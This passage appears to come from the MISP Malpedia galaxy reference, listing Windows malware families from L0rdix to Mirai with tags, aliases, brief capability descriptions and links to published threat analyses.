**L0rdix**

L0rdix is a multipurpose .NET remote access tool (RAT) first discovered being sold on underground forums in November 2018. Out of the box, L0rdix supports eight commands, although custom commands can be defined and added. These include:
L0rdix can extract credentials from common web browsers and steal data from crypto wallets and a target’s clipboard. Optionally, L0rdix can deploy a cryptominer (XMRig) to its bots.

The tag is: misp-galaxy:malpedia=“L0rdix”

L0rdix is also known as:

- lordix

Table 2036. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.lordix">https://malpedia.caad.fkie.fraunhofer.de/details/win.lordix</a></td>
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<td><a href="https://twitter.com/hexlax/status/1058356670835908610">https://twitter.com/hexlax/status/1058356670835908610</a></td>
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<td><a href="https://github.com/cryptogramfan/Malware-Analysis-Scripts/blob/master/decrypt_l0rdix_c2.py">https://github.com/cryptogramfan/Malware-Analysis-Scripts/blob/master/decrypt_l0rdix_c2.py</a></td>
</tr>
<tr>
<td><a href="https://blog.ensilo.com/lordix-attack-tool">https://blog.ensilo.com/lordix-attack-tool</a></td>
</tr>
</tbody>
</table>

Loup

Frank Boldewin describes Loup as a small cli-tool to cash out NCR devices (ATM).

The tag is: misp-galaxy:malpedia=“Loup”

Loup is also known as:

Table 2037. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.loup">https://malpedia.caad.fkie.fraunhofer.de/details/win.loup</a></td>
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</table>

LOWBALL

LOWBALL, uses the legitimate Dropbox cloud-storage service to act as the CnC server. It uses the Dropbox API with a hardcoded bearer access token and has the ability to download, upload, and execute files. The communication occurs via HTTPS over port 443.

The tag is: misp-galaxy:malpedia=“LOWBALL”

LOWBALL is also known as:
LOWKEY

The tag is: misp-galaxy:malpedia="LOWKEY"

LOWKEY is also known as:

- PortReuse

Lucifer

The tag is: misp-galaxy:malpedia="Lucifer"

Lucifer is also known as:

Luminosity RAT

The tag is: misp-galaxy:malpedia="Luminosity RAT"

Luminosity RAT is also known as:

- LuminosityLink
LunchMoney

An uploader that can exfiltrate files to Dropbox.

The tag is: *misp-galaxy:malpedia=“LunchMoney”*

LunchMoney is also known as:

Table 2042. Table References

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<td><a href="https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html">https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html</a></td>
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<tr>
<td><a href="https://twitter.com/MrDanPerez/status/1097881406661902337">https://twitter.com/MrDanPerez/status/1097881406661902337</a></td>
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Lurk

The tag is: *misp-galaxy:malpedia=“Lurk”*

Lurk is also known as:

Table 2043. Table References

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<td><a href="https://www.secureworks.com/research/malware-analysis-of-the-lurk-downloader">https://www.secureworks.com/research/malware-analysis-of-the-lurk-downloader</a></td>
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**Luzo**

The tag is: *misp-galaxy:malpedia=Luzo*

Luzo is also known as:

*Table 2044. Table References*

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**Lyposit**

The tag is: *misp-galaxy:malpedia=Lyposit*

Lyposit is also known as:

- Adneukine
- Bomba Locker
- Lucky Locker

*Table 2045. Table References*

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<td><a href="https://blog.avast.com/2013/05/20/lockscreen-win32lyposit-displayed-as-a-fake-macos-app/">https://blog.avast.com/2013/05/20/lockscreen-win32lyposit-displayed-as-a-fake-macos-app/</a></td>
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<td><a href="http://malware.dontneedcoffee.com/2013/05/unveiling-locker-bomba-aka-lucky-locker.html">http://malware.dontneedcoffee.com/2013/05/unveiling-locker-bomba-aka-lucky-locker.html</a></td>
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**M00nD3V Logger**

The tag is: *misp-galaxy:malpedia=M00nD3V Logger*

M00nD3V Logger is also known as:

*Table 2046. Table References*

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<td><a href="https://www.zscaler.com/blogs/research/deep-dive-m00nd3v-logger">https://www.zscaler.com/blogs/research/deep-dive-m00nd3v-logger</a></td>
</tr>
</tbody>
</table>

**Machete**

According to ESET, Machete’s dropper is a RAR SFX executable. Three py2exe components are dropped: GoogleCrash.exe, Chrome.exe and GoogleUpdate.exe. A single configuration file, jer.dll, is dropped, and it contains base64-encoded text that corresponds to AES-encrypted strings.
GoogleCrash.exe is the main component of the malware. It schedules execution of the other two components and creates Windows Task Scheduler tasks to achieve persistence. Regarding the geolocation of victims, Chrome.exe collects data about nearby Wi-Fi networks and sends it to the Mozilla Location Service API. In short, this application provides geolocation coordinates when it's given other sources of data such as Bluetooth beacons, cell towers or Wi-Fi access points. Then the malware takes latitude and longitude coordinates to build a Google Maps URL. The GoogleUpdate.exe component is responsible for communicating with the remote C&C server. The configuration to set the connection is read from the jer.dll file: domain name, username and password. The principal means of communication for Machete is via FTP, although HTTP communication was implemented as a fallback in 2019.

The tag is: misp-galaxy:malpedia="Machete"

Machete is also known as:

- El Machete

Table 2047. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.machete">https://malpedia.caad.fkie.fraunhofer.de/details/win.machete</a></td>
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<td><a href="https://securelist.com/el-machete/66108/">https://securelist.com/el-machete/66108/</a></td>
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<td><a href="https://medium.com/@verovaleros/el-machete-what-do-we-know-about-the-apt-targeting-latin-america-be7d11e690e6">https://medium.com/@verovaleros/el-machete-what-do-we-know-about-the-apt-targeting-latin-america-be7d11e690e6</a></td>
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<td><a href="https://www.welivesecurity.com/2019/08/05/sharpening-machete-cyberespionage/">https://www.welivesecurity.com/2019/08/05/sharpening-machete-cyberespionage/</a></td>
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MadMax

The tag is: misp-galaxy:malpedia="MadMax"

MadMax is also known as:

Table 2048. Table References

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Magala

The tag is: misp-galaxy:malpedia="Magala"
Magala is also known as:

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<td><a href="https://securelist.com/the-magala-trojan-clicker-a-hidden-advertising-threat/78920/">https://securelist.com/the-magala-trojan-clicker-a-hidden-advertising-threat/78920/</a></td>
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### Magniber

The tag is: `misp-galaxy:malpedia="Magniber"`

Magniber is also known as:

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<td><a href="https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/">https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/</a></td>
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<td><a href="http://asec.ahnlab.com/1124">http://asec.ahnlab.com/1124</a></td>
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### Mailto

The tag is: `misp-galaxy:malpedia="Mailto"`

Mailto is also known as:

- Koko Ransomware
- NetWalker

Table 2051. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.mailto">https://malpedia.caad.fkie.fraunhofer.de/details/win.mailto</a></td>
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<td><a href="https://sites.temple.edu/care/ci-rw-attacks/">https://sites.temple.edu/care/ci-rw-attacks/</a></td>
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<td><a href="https://www.mcafee.com/blogs/other-blogs/mcafee-labs/take-a-netwalk-on-the-wild-side/">https://www.mcafee.com/blogs/other-blogs/mcafee-labs/take-a-netwalk-on-the-wild-side/</a></td>
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MajikPos
The tag is: misp-galaxy:malpedia="MajikPos"
MajikPos is also known as:
Table 2052. Table References

Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.majik_pos

Makadocs
The tag is: misp-galaxy:malpedia="Makadocs"
Makadocs is also known as:
Table 2053. Table References

Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.makdocs
http://contagiodump.blogspot.com/2012/12/nov-2012-backdoorw32makadocs-sample.html
MakLoader

The tag is: misp-galaxy:malpedia="MakLoader"

MakLoader is also known as:

Table 2054. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.makloader
https://twitter.com/James_inthe_box/status/1046844087469391872

Makop Ransomware

The tag is: misp-galaxy:malpedia="Makop Ransomware"

Makop Ransomware is also known as:

Table 2055. Table References

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https://malpedia.caad.fkie.fraunhofer.de/details/win.makop_ransomware
https://twitter.com/siri_urz/status/1221797493849018368

Maktub

The tag is: misp-galaxy:malpedia="Maktub"

Maktub is also known as:

Table 2056. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.maktub
https://www.intezer.com/iron-cybercrime-group-under-the-scope-2/
https://bartblaze.blogspot.de/2018/04/maktub-ransomware-possibly-rebranded-as.html
**MalumPOS**

The tag is: `misp-galaxy:malpedia="MalumPOS"`

MalumPOS is also known as:

*Table 2057. Table References*

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**Mamba**

The tag is: `misp-galaxy:malpedia="Mamba"`

Mamba is also known as:

- DiskCryptor
- HDDCryptor

*Table 2058. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.mamba">https://malpedia.caad.fkie.fraunhofer.de/details/win.mamba</a></td>
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<td><a href="https://securelist.com/the-return-of-mamba-ransomware/79403/">https://securelist.com/the-return-of-mamba-ransomware/79403/</a></td>
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<tr>
<td><a href="https://www.youtube.com/watch?v=LUxOcpIRxmg">https://www.youtube.com/watch?v=LUxOcpIRxmg</a></td>
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**ManameCrypt**

The tag is: `misp-galaxy:malpedia="ManameCrypt"`

ManameCrypt is also known as:

- CryptoHost

*Table 2059. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.manamecrypt">https://malpedia.caad.fkie.fraunhofer.de/details/win.manamecrypt</a></td>
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<td><a href="https://www.gdatasoftware.com/blog/2016/04/28234-manamecrypt-a-ransomware-that-takes-a-different-route">https://www.gdatasoftware.com/blog/2016/04/28234-manamecrypt-a-ransomware-that-takes-a-different-route</a></td>
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Mangzamel

The tag is: misp-galaxy:malpedia="Mangzamel"

Mangzamel is also known as:

- junidor
- mengkite
- vedratve

Table 2060. Table References

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Manifestus

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Manifestus is also known as:

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ManItsMe

The tag is: misp-galaxy:malpedia="ManItsMe"

ManItsMe is also known as:

Table 2062. Table References

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Maoloa

Ransomware family closely related to GlobeImposter, notable for its use of SHACAL-2 encryption algorithm.

The tag is: `misp-galaxy:malpedia="Maoloa"`

Maoloa is also known as:

*Table 2063. Table References*

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<td><a href="https://id-ransomware.blogspot.com/2019/02/maoloa-ransomware.html">https://id-ransomware.blogspot.com/2019/02/maoloa-ransomware.html</a></td>
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MAPIget

The tag is: `misp-galaxy:malpedia="MAPIget"`

MAPIget is also known as:

*Table 2064. Table References*

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Marap

Marap is a downloader, named after its command and control (C&C) phone home parameter "param" spelled backwards. It is written in C and contains a few notable anti-analysis features.

The tag is: `misp-galaxy:malpedia="Marap"`

Marap is also known as:

*Table 2065. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.marap">https://malpedia.caad.fkie.fraunhofer.de/details/win.marap</a></td>
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Mariposa

The tag is: misp-galaxy:malpedia="Mariposa"

Mariposa is also known as:

- Autorun
- Palevo
- Rimecud

Table 2066. Table References

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<tr>
<td><a href="https://defintel.com/docs/Mariposa_Analysis.pdf">https://defintel.com/docs/Mariposa_Analysis.pdf</a></td>
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Masad Stealer

The tag is: misp-galaxy:malpedia="Masad Stealer"

Masad Stealer is also known as:

Table 2067. Table References

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</table>

MASS Logger

MASS Logger is a .NET credential stealer. It starts with a launcher that uses simple anti-debugging techniques which can be easily bypassed when identified. This first stage loader eventually XOR-decrypts the second stage assembly which then decrypts, loads and executes the final MassLogger payload.

The tag is: misp-galaxy:malpedia="MASS Logger"

MASS Logger is also known as:

Table 2068. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.masslogger">https://malpedia.caad.fkie.fraunhofer.de/details/win.masslogger</a></td>
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Matrix Banker

The tag is: misp-galaxy:malpedia="Matrix Banker"

Matrix Banker is also known as:

Table 2069. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.matrix_banker">https://malpedia.caad.fkie.fraunhofer.de/details/win.matrix_banker</a></td>
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<td><a href="https://www.arbornetworks.com/blog/asert/another-banker-enters-matrix/">https://www.arbornetworks.com/blog/asert/another-banker-enters-matrix/</a></td>
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Matrix Ransom

The tag is: misp-galaxy:malpedia="Matrix Ransom"

Matrix Ransom is also known as:

Table 2070. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.matrix_ransom">https://malpedia.caad.fkie.fraunhofer.de/details/win.matrix_ransom</a></td>
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<td><a href="https://www.blackhoodie.re/assets/archive/Matrix_Ransomware_blackhoodie.pdf">https://www.blackhoodie.re/assets/archive/Matrix_Ransomware_blackhoodie.pdf</a></td>
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Matryoshka RAT

The tag is: misp-galaxy:malpedia="Matryoshka RAT"

Matryoshka RAT is also known as:
Matsnu

The tag is: misp-galaxy:malpedia="Matsnu"

Matsnu is also known as:

Maudi

Specialized PoisonIvy Sideloader.

The tag is: misp-galaxy:malpedia="Maudi"

Maudi is also known as:

Maze

Maze Ransomware encrypts files and makes them inaccessible while adding a custom extension containing part of the ID of the victim. The ransom note is placed inside a text file and an htm file. There are a few different extensions appended to files which are randomly generated.

Actors are known to exfiltrate the data from the network for further extortion. It spreads mainly using email spam and various exploit kits (Spelevo, Fallout).

The code of Maze ransomware is highly complicated and obfuscated, which helps to evade security solutions using signature-based detections.
The tag is: misp-galaxy:malpedia="Maze"

Maze is also known as:

- ChaCha

Table 2074. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.maze">https://malpedia.caad.fkie.fraunhofer.de/details/win.maze</a></td>
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<td><a href="https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Maze.md">https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Maze.md</a></td>
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<td><a href="https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html">https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html</a></td>
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<td><a href="https://www.crowdstrike.com/blog/maze-ransomware-deobfuscation/">https://www.crowdstrike.com/blog/maze-ransomware-deobfuscation/</a></td>
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<td><a href="https://techcrunch.com/2020/03/26/chubb-insurance-breach-ransomware/">https://techcrunch.com/2020/03/26/chubb-insurance-breach-ransomware/</a></td>
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<td><a href="https://blog.chainsalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpayer">https://blog.chainsalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpayer</a></td>
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<td><a href="https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html">https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html</a></td>
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<td><a href="https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/">https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/</a></td>
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<td><a href="https://github.com/albertzsigovits/malware-notes/blob/master/Maze.md">https://github.com/albertzsigovits/malware-notes/blob/master/Maze.md</a></td>
</tr>
</tbody>
</table>
**MBRlock**

This ransomware modifies the master boot record of the victim's computer so that it shows a ransom note before Windows starts.

The tag is: `misp-galaxy:malpedia=“MBRlock”`

MBRlock is also known as:

- DexLocker

**Table 2075. Table References**

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.mbrlock">https://malpedia.caad.fkie.fraunhofer.de/details/win.mbrlock</a></td>
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<td><a href="https://app.any.run/tasks/0a7e643f-7562-4575-b8a5-747bd6b5f02d">https://app.any.run/tasks/0a7e643f-7562-4575-b8a5-747bd6b5f02d</a></td>
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**MBR Locker**

The tag is: `misp-galaxy:malpedia=“MBR Locker”`

MBR Locker is also known as:

**Table 2076. Table References**

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.mbrlocker">https://malpedia.caad.fkie.fraunhofer.de/details/win.mbrlocker</a></td>
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**Mebromi**

The tag is: `misp-galaxy:malpedia=“Mebromi”`

Mebromi is also known as:

- MyBios

**Table 2077. Table References**

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MECHANICAL

The tag is: misp-galaxy:malpedia="MECHANICAL"

MECHANICAL is also known as:

• GoldStamp

Medre

The tag is: misp-galaxy:malpedia="Medre"

Medre is also known as:

Medusa (Windows)

Medusa is a DDoS bot written in .NET 2.0. In its current incarnation its C&C protocol is based on HTTP, while its predecessor made use of IRC.

The tag is: misp-galaxy:malpedia="Medusa (Windows)"

Medusa (Windows) is also known as:
MedusaLocker

A Windows ransomware that will run certain tasks to prepare the target system for the encryption of files. MedusaLocker avoids executable files, probably to avoid rendering the targeted system unusable for paying the ransom. It uses a combination of AES and RSA-2048, and reportedly appends extensions such as .encrypted, .bomber, .boroff, .breakingbad, .locker16, .newlock, .nlocker, and .skynet.

The tag is: misp-galaxy:malpedia="MedusaLocker"

MedusaLocker is also known as:

• AKO Doxware
• AKO Ransomware
• MedusaReborn

Table 2081. Table References

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<td><a href="https://www.carbonblack.com/2020/06/03/tau-threat-analysis-medusa-locker-ransomware/">https://www.carbonblack.com/2020/06/03/tau-threat-analysis-medusa-locker-ransomware/</a></td>
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<td><a href="https://us-cert.cisa.gov/ncas/alerts/aa20-345a">https://us-cert.cisa.gov/ncas/alerts/aa20-345a</a></td>
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<td><a href="https://id-ransomware.blogspot.com/2020/01/ako-ransomware.html">https://id-ransomware.blogspot.com/2020/01/ako-ransomware.html</a></td>
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<td><a href="https://twitter.com/siri_urz/status/1215194488714346496?s=20">https://twitter.com/siri_urz/status/1215194488714346496?s=20</a></td>
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MegaCortex

MegaCortex is a ransomware used in targeted attacks against corporations. Once the ransomware is run it tries to stop security related services and after that it starts its own encryption process adding a .aes128ctr or .megac0rtx extension to the encrypted files. It is used to be carried from downloaders and trojans, it has no own propagation capabilities.

The tag is: misp-galaxy:malpedia="MegaCortex"

MegaCortex is also known as:

Table 2082. Table References

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<tr>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.megacortex">https://malpedia.caad.fkie.fraunhofer.de/details/win.megacortex</a></td>
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<td><a href="https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/">https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/</a></td>
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<td><a href="https://blog.malwarebytes.com/detections/ransom-megacortex/">https://blog.malwarebytes.com/detections/ransom-megacortex/</a></td>
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<td><a href="https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware">https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware</a></td>
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<td><a href="https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html">https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html</a></td>
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<td><a href="https://news.sophos.com/en-us/2019/05/03/megacortex-ransomware-wants-to-be-the-one/">https://news.sophos.com/en-us/2019/05/03/megacortex-ransomware-wants-to-be-the-one/</a></td>
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<td><a href="https://threatpost.com/megacortex-ransomware-mass-distribution/146933/">https://threatpost.com/megacortex-ransomware-mass-distribution/146933/</a></td>
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<td><a href="https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/">https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/</a></td>
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Megumin Trojan

Megumin Trojan, is a malware focused on multiple fields (DDoS, Miner, Loader, Clipper).

The tag is: misp-galaxy:malpedia="MeguminTrojan"

Megumin Trojan is also known as:

Table 2083. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.megumin">https://malpedia.caad.fkie.fraunhofer.de/details/win.megumin</a></td>
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<td><a href="https://fumik0.com/2019/05/03/lets-nuke-megumin-trojan/">https://fumik0.com/2019/05/03/lets-nuke-megumin-trojan/</a></td>
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Mekotio

The tag is: misp-galaxy:malpedia="Mekotio"

Mekotio is also known as:

Table 2084. Table References

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Melcoz

The tag is: misp-galaxy:malpedia="Melcoz"

Melcoz is also known as:

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Merlin

Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.

The tag is: misp-galaxy:malpedia="Merlin"
Merlin is also known as:

Table 2086. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.merlin
http://lockboxx.blogspot.com/2018/02/merlin-for-red-teams.html
https://github.com/Ne0nd0g/merlin

Mespinoza

Mespinoza is a ransomware which encrypts file using an asymmetric encryption and adds .pysa as file extension. According to dissectingmalware the extension "pysa" is probably derived from the Zanzibari Coin with the same name.

The tag is: misp-galaxy:malpedia="Mespinoza"

Mespinoza is also known as:

• pysa

Table 2087. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mespinoza
https://id-ransomware.blogspot.com/2019/10/mespinoza-ransomware.html.html
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf
https://www.cert.ssi.gouv.fr/cti/CERTFR-2020-CTI-002/
https://twitter.com/campuscodi/status/1347223969984897026

MetadataBin Ransomware

The tag is: misp-galaxy:malpedia="MetadataBin Ransomware"

MetadataBin Ransomware is also known as:
• Ransomware32

Table 2088. Table References

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**METALJACK**

The tag is: *misp-galaxy:malpedia="METALJACK"*

METALJACK is also known as:

• denesRAT

Table 2089. Table References

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<td><a href="https://www.secrss.com/articles/17900">https://www.secrss.com/articles/17900</a></td>
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<td><a href="https://m.threatbook.cn/detail/2527">https://m.threatbook.cn/detail/2527</a></td>
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<td><a href="https://www.youtube.com/watch?v=ftjDH65kw6E">https://www.youtube.com/watch?v=ftjDH65kw6E</a></td>
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**Metamorfo**

The tag is: *misp-galaxy:malpedia="Metamorfo"*

Metamorfo is also known as:

• Casbaneiro

Table 2090. Table References

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Meterpreter (Windows)

The tag is: misp-galaxy:malpedia="Meterpreter (Windows)"

Meterpreter (Windows) is also known as:

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<td><a href="https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/China/APT/Chimera/Analysis.md">https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/China/APT/Chimera/Analysis.md</a></td>
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<td><a href="https://redcanary.com/blog/getsystem-offsec/">https://redcanary.com/blog/getsystem-offsec/</a></td>
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<td><a href="https://www.wired.com/story/russias-fancy-bear-hack-us-federal-agency/">https://www.wired.com/story/russias-fancy-bear-hack-us-federal-agency/</a></td>
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<td><a href="https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf">https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf</a></td>
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<td><a href="https://blog.morphisec.com/fin7-attacks-restaurant-industry">https://blog.morphisec.com/fin7-attacks-restaurant-industry</a></td>
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<td><a href="http://schierlm.users.sourceforge.net/avevasion.html">http://schierlm.users.sourceforge.net/avevasion.html</a></td>
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<td><a href="https://us-cert.cisa.gov/ncas/alerts/aa20-301a">https://us-cert.cisa.gov/ncas/alerts/aa20-301a</a></td>
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Mewsei

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**MgBot**

The tag is: `misp-galaxy:malpedia="MgBot"`

MgBot is also known as:

- BLame
- MgmBot

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**Miancha**

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**Micrass**

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Micrass is also known as:

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Microcin

The tag is: misp-galaxy:malpedia="Microcin"

Microcin is also known as:

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<td><a href="https://www.welivesecurity.com/2020/05/14/mikroceen-spying-backdoor-high-profile-networks-central-asia/">https://www.welivesecurity.com/2020/05/14/mikroceen-spying-backdoor-high-profile-networks-central-asia/</a></td>
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<td><a href="https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/">https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/</a></td>
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<td><a href="https://github/dlegezo/common">https://github/dlegezo/common</a></td>
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<td><a href="https://securelist.com/a-simple-example-of-a-complex-cyberattack/82636/">https://securelist.com/a-simple-example-of-a-complex-cyberattack/82636/</a></td>
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<td><a href="https://securelist.com/microcin-is-here/97353/">https://securelist.com/microcin-is-here/97353/</a></td>
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Micropsia

The tag is: misp-galaxy:malpedia="Micropsia"

Micropsia is also known as:

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.micropsia">https://malpedia.caad.fkie.fraunhofer.de/details/win.micropsia</a></td>
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<td><a href="http://blog.talosintelligence.com/2017/06/palestine-delphi.html">http://blog.talosintelligence.com/2017/06/palestine-delphi.html</a></td>
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<td><a href="https://research.checkpoint.com/apt-attack-middle-east-big-bang/">https://research.checkpoint.com/apt-attack-middle-east-big-bang/</a></td>
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<td><a href="https://github.com/jeFF0Falltrades/IoCs/blob/master/APT/micropsia_apt_c_23.md">https://github.com/jeFF0Falltrades/IoCs/blob/master/APT/micropsia_apt_c_23.md</a></td>
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**Mikoponi**

The tag is `misp-galaxy:malpedia="Mikoponi"`

Mikoponi is also known as:

*Table 2098. Table References*

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<td><a href="https://www.anomali.com/blog/targeted-ransomware-activity">https://www.anomali.com/blog/targeted-ransomware-activity</a></td>
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**MILKMAID**

The tag is `misp-galaxy:malpedia="MILKMAID"`

MILKMAID is also known as:

*Table 2099. Table References*

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<td><a href="https://www2.fireeye.com/rs/fireeye/images/rpt-apt30.pdf">https://www2.fireeye.com/rs/fireeye/images/rpt-apt30.pdf</a></td>
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</table>

**Milum**

In August 2019, Kaspersky Labs discovered a malware they dubbed Milum (naming based on internal file name fragments) when investigating an operation they named WildPressure. It is written in C++ using STL, primarily to parse JSON. Functionality includes bidirectional file transmission and remote command execution.

The tag is `misp-galaxy:malpedia="Milum"`

Milum is also known as:

*Table 2100. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.milum">https://malpedia.caad.fkie.fraunhofer.de/details/win.milum</a></td>
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<td><a href="https://securelist.com/wildpressure-targets-industrial-in-the-middle-east/96360/">https://securelist.com/wildpressure-targets-industrial-in-the-middle-east/96360/</a></td>
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**MimiKatz**

The tag is `misp-galaxy:malpedia="MimiKatz"`

MimiKatz is also known as:
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<td><a href="https://blog.xpnsec.com/exploring-mimikatz-part-1/">https://blog.xpnsec.com/exploring-mimikatz-part-1/</a></td>
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<td><a href="https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/">https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/</a></td>
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<td><a href="https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5758557d-6e3a-4174-90f3-fa92a712ecd9&amp;CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&amp;tab=librarydocuments">https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5758557d-6e3a-4174-90f3-fa92a712ecd9&amp;CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&amp;tab=librarydocuments</a></td>
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<td><a href="https://www.welivesecurity.com/research/bronze-vinewood-targets-supply-chains">https://www.welivesecurity.com/research/bronze-vinewood-targets-supply-chains</a></td>
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<td><a href="https://www.wired.com/story/how-mimikatz-became-go-to-hacker-tool/">https://www.wired.com/story/how-mimikatz-became-go-to-hacker-tool/</a></td>
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<td><a href="https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html">https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html</a></td>
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<td><a href="https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/">https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/</a></td>
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<td><a href="https://medium.com/cycraft/taiwan-high-tech-ecosystem-targeted-by-foreign-apt-group-5473d2ad8730">https://medium.com/cycraft/taiwan-high-tech-ecosystem-targeted-by-foreign-apt-group-5473d2ad8730</a></td>
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<td><a href="https://www.welivesecurity.com/2020/05/21/no-game-over-winniti-group/">https://www.welivesecurity.com/2020/05/21/no-game-over-winniti-group/</a></td>
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<td><a href="http://blog.gentilkiwi.com/securite/un-observateur-evenements-aveugle">http://blog.gentilkiwi.com/securite/un-observateur-evenements-aveugle</a></td>
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<td><a href="https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/">https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/</a></td>
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<td><a href="https://www.zdnet.com/article/fbi-says-an-iranian-hacking-group-is-attacking-f5-networking-devices/">https://www.zdnet.com/article/fbi-says-an-iranian-hacking-group-is-attacking-f5-networking-devices/</a></td>
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<td><a href="https://us-cert.cisa.gov/ncas/alerts/aa20-275a">https://us-cert.cisa.gov/ncas/alerts/aa20-275a</a></td>
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<td><a href="https://www.matteomalvica.com/blog/2020/01/30/mimikatz-lsass-dump-windg-pykd/">https://www.matteomalvica.com/blog/2020/01/30/mimikatz-lsass-dump-windg-pykd/</a></td>
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<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/bronze-atlas">https://www.secureworks.com/research/threat-profiles/bronze-atlas</a></td>
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<td><a href="https://www.secureworks.com/research/threat-profiles/gold-kingswood">https://www.secureworks.com/research/threat-profiles/gold-kingswood</a></td>
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MINEBRIDGE

The tag is: misp-galaxy:malpedia="MINEBRIDGE"

MINEBRIDGE is also known as:

- GazGolder

Table 2102. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.minebridge">https://malpedia.caad.fkie.fraunhofer.de/details/win.minebridge</a></td>
</tr>
<tr>
<td><a href="https://blog.morphisec.com/minebridge-on-the-rise-sophisticated-delivery-mechanism">https://blog.morphisec.com/minebridge-on-the-rise-sophisticated-delivery-mechanism</a></td>
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MiniASP

The tag is: misp-galaxy:malpedia="MiniASP"

MiniASP is also known as:

Table 2103. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.miniasp">https://malpedia.caad.fkie.fraunhofer.de/details/win.miniasp</a></td>
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MiniDuke

The tag is: misp-galaxy:malpedia="MiniDuke"

MiniDuke is also known as:

Table 2104. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.miniduke">https://malpedia.caad.fkie.fraunhofer.de/details/win.miniduke</a></td>
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Mirage

The tag is: `misp-galaxy:malpedia="Mirage"`

Mirage is also known as:

Table 2105. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.mirage">https://malpedia.caad.fkie.fraunhofer.de/details/win.mirage</a></td>
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<td><a href="https://www.secureworks.com/research/threat-profiles/bronze-palace">https://www.secureworks.com/research/threat-profiles/bronze-palace</a></td>
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MirageFox

The tag is: `misp-galaxy:malpedia="MirageFox"`

MirageFox is also known as:

Table 2106. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.miragefox">https://malpedia.caad.fkie.fraunhofer.de/details/win.miragefox</a></td>
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Mirai (Windows)

